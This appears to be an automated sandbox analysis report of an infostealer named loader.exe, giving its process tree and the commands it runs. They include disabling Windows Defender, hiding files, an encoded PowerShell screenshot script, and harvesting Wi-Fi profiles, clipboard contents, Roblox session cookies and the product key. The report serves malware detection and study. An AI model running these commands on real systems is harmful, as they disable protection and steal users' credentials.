PID 4368 wrote to memory of 4304	4368	cmd.exe	reg.exe
PID 3948 wrote to memory of 2440	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 2440	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 2440	3948	loader.exe	cmd.exe
PID 2440 wrote to memory of 3596	2440	cmd.exe	reg.exe
PID 2440 wrote to memory of 3596	2440	cmd.exe	reg.exe
PID 2440 wrote to memory of 3596	2440	cmd.exe	reg.exe
PID 3948 wrote to memory of 4388	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4388	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4388	3948	loader.exe	cmd.exe
PID 4388 wrote to memory of 2220	4388	cmd.exe	WMIC.exe
PID 4388 wrote to memory of 2220	4388	cmd.exe	WMIC.exe
PID 4388 wrote to memory of 2220	4388	cmd.exe	WMIC.exe
PID 3948 wrote to memory of 4888	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4888	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 4888	3948	loader.exe	cmd.exe
PID 4888 wrote to memory of 2956	4888	cmd.exe	WMIC.exe
PID 4888 wrote to memory of 2956	4888	cmd.exe	WMIC.exe
PID 4888 wrote to memory of 2956	4888	cmd.exe	WMIC.exe
PID 3948 wrote to memory of 2708	3948	loader.exe	powershell.exe
PID 3948 wrote to memory of 2708	3948	loader.exe	powershell.exe
PID 3948 wrote to memory of 2708	3948	loader.exe	powershell.exe
PID 3948 wrote to memory of 912	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 912	3948	loader.exe	cmd.exe
PID 3948 wrote to memory of 912	3948	loader.exe	cmd.exe
PID 912 wrote to memory of 5100	912	cmd.exe	powershell.exe
PID 912 wrote to memory of 5100	912	cmd.exe	powershell.exe
PID 912 wrote to memory of 5100	912	cmd.exe	powershell.exe
PID 2708 wrote to memory of 2664	2708	cmd.exe	attrib.exe
PID 2708 wrote to memory of 2664	2708	cmd.exe	attrib.exe
PID 2708 wrote to memory of 2664	2708	cmd.exe	attrib.exe
PID 3948 wrote to memory of 5040	3948	loader.exe	cmd.exe

Views/modifies file attributes 1 TTPs 9 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2644 attrib.exe
5948 attrib.exe
5204 attrib.exe
2664 attrib.exe
3052 attrib.exe
3980 attrib.exe
4372 attrib.exe
5540 attrib.exe
1040 attrib.exe

pid	process
2644	attrib.exe
5948	attrib.exe
5204	attrib.exe
2664	attrib.exe
3052	attrib.exe
3980	attrib.exe
4372	attrib.exe
5540	attrib.exe
1040	attrib.exe

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1432

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
3⤵
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:4368

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
4⤵
PID:4304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:2440

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
4⤵
PID:3596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:2956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe""
3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe"
4⤵
- Views/modifies file attributes
PID:2664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
3⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5040

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:4484

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:3344

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:1060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:3328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5096

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:2484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4368

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:4168

C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:1688

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:2960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
3⤵
PID:1460

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
4⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:2476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkz0dtxx\bkz0dtxx.cmdline"
5⤵
PID:1508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5AB3.tmp" "c:\Users\Admin\AppData\Local\Temp\bkz0dtxx\CSCE398E6C6A0244F639D1426D01DC435.TMP"
6⤵
PID:4364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5092

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:2480

C:\Windows\SysWOW64\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
4⤵
- Views/modifies file attributes
PID:3052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4764

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:3844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:3508

C:\Windows\SysWOW64\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
4⤵
- Views/modifies file attributes
PID:3980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5112

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1200

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:1528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:412

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:4900

C:\Windows\SysWOW64\tree.com
tree /A /F
4⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:2220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
3⤵
PID:1412

C:\Windows\SysWOW64\getmac.exe
getmac
4⤵
PID:1976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
3⤵
PID:4120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14322\rar.exe a -r -hp"jayora" "C:\Users\Admin\AppData\Local\Temp\RmCSi.zip" *"
3⤵
PID:4984

C:\Users\Admin\AppData\Local\Temp\_MEI14322\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI14322\rar.exe a -r -hp"jayora" "C:\Users\Admin\AppData\Local\Temp\RmCSi.zip" *
4⤵
- Executes dropped EXE
PID:3652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
PID:1892

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic os get Caption
4⤵
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
PID:3388

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:2960

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
3⤵
PID:3104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:4488

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
3⤵
PID:3988

